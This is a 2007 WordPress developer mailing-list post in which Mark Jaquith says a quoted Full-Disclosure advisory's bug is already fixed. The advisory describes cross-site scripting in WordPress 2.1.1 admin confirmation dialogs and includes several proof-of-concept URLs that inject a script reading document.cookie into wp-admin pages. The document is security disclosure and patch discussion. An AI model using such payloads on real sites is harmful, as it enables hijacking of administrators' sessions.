[wp-hackers] FW: [Full-disclosure] Wordpress 2.1.1 - Multiple Script InjectionVulnerabilities

Mark Jaquith mark.wordpress at txfx.net
Thu Mar 1 04:19:41 GMT 2007


Already fixed.  This is the same bug as in the Secunia advisory.  The  
fix was a different one than advised by Secunia, because Senunia  
misdiagnosed the issue.  It's not that there is an unvalidated  
parameter... it is that the URL itself is spit back out without being  
sanitized.  So any parameter (even made up ones) can be the cause of  
the HTML injection.

On Feb 27, 2007, at 7:00 PM, Ross M. W. Bennetts wrote:

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Stefan
> Friedli
> Sent: Wednesday, 28 February 2007 2:10 AM
> To: bugtraq at securityfocus.com
> Cc: full-disclosure at lists.grok.org.uk; news at securiteam.com;
> support at secunia.com
> Subject: [Full-disclosure] Wordpress 2.1.1 - Multiple Script
> InjectionVulnerabilities
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities
>
> scip AG Vulnerability ID 2962 (02/27/2007)
> http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962
>
> I. INTRODUCTION
>
> "WordPress is a state-of-the-art semantic personal publishing platform
> with a focus on aesthetics, web standards, and usability."
> More information is available on the project web site at the  
> following URL:
>
>      http://www.wordpress.org
>
> II. DESCRIPTION
>
> Stefan Friedli found several vulnerabilities based on an advisory
> entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender"  
> which
> described a lack of input validation when deleting posts that allows
> injection of arbitrary code. The vulnerability was reported on  
> February,
> 26th and is referenced in section VII.
>
> Further to this vulnerability which was limited on manipulating the
> "post"-parameter, there are several other vulnerabilities which are  
> very
> similar to the one mentioned above. Every operation that makes use of
> the common confirm-dialog is vulnerable for this type of attack.
>
> Possible injection...
>
> ... when deleting posts as mentioned in Samenspenders advisory
> (unvalidated parameter: post, file: post.php)
> http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript 
> %3Ealert
> (document.cookie)%3C/script%3E
>
> ... when deleting comments (unvalidated parameter: c, file:  
> comment.php)
> http://target.tld/wp-admin/comment.php? 
> action=deletecomment&p=39&c='%3E%3Csc
> ript%3Ealert(document.cookie)%3C/script%3E
>
> ... when deleting pages (unvalidated parameter: page, file: page.php)
> http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript 
> %3Ealert
> (document.cookie)%3C/script%3E
>
> ... when deleting categories (unvalidated parameter: cat_ID, file:
> categories.php)
> http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E% 
> 3Cscript
> %3Ealert(document.cookie)%3C/script%3E
>
> ... when deleting comments (unvalidated parameter: c, file:  
> comment.php)
> http://target.tld/wp-admin/comment.php? 
> action=deletecomment&p=35&c='%3E%3Csc
> ript%3Ealert(document.cookie)%3C/script%3E
>
> IV. IMPACT
>
> This list may not be exhaustive. It illustrated that the flaw with
> confirmation dialogs in Wordpress is not limited to the "Delete
> Post"-function. Fixing the validation of the post parameter as  
> suggested
> by e.g. Secunia does not fix the problem and does not reduce the  
> threat
> of cross-site-scripting or any other webbased exploitation.
>
> V. DETECTION
>
> This flaws can be detected by using any web browser.
>
> VI. SOLUTION
>
> Until these issues are patched, possible workarounds are manual fixing
> or the usage of a application level filter like mod_security for  
> Apache.
>
> VII. SOURCES
>
> Samenspender - WordPress AdminPanel CSRF/XSS - 0day
> http://seclists.org/bugtraq/2007/Feb/0494.html
>
> scip AG - Security Consulting Information Process (german)
> http://www.scip.ch
>
> scip AG Vulnerability Database (german)
> http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962
>
> IX. DISCLOSURE TIMELINE
>
> 02/26/06 Release of "Delete Post"-Confirmation Vulnerability
> 02/27/06 Identification of further vulnerabilities
> 02/27/06 Immediated Release for informational purposes
>
> IX. CREDITS
>
> The vulnerabilities were discovered by Stefan Friedli.
>
>      Stefan Friedli, scip AG, Zuerich, Switzerland
>      stfr-at-scip.ch
>      http://www.scip.ch
>
> A2. LEGAL NOTICES
>
> Copyright (c) 2007 scip AG, Switzerland.
>
> Permission is granted for the re-distribution of this alert. It may  
> not
> be edited in any way without permission of scip AG.
>
> The information in the advisory is believed to be accurate at the time
> of publishing based on currently available information. There are no
> warranties with regard to this information. Neither the author nor the
> publisher accepts any liability for any direct, indirect or
> consequential loss or damage from use of or reliance on this advisory.
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.0.6
>
> iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS
> oTWNsT+cOMwFq+XKsZqq6yJ/
> =REO6
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

--
Mark Jaquith
http://markjaquith.com/

Covered Web Services
http://coveredwebservices.com/




More information about the wp-hackers mailing list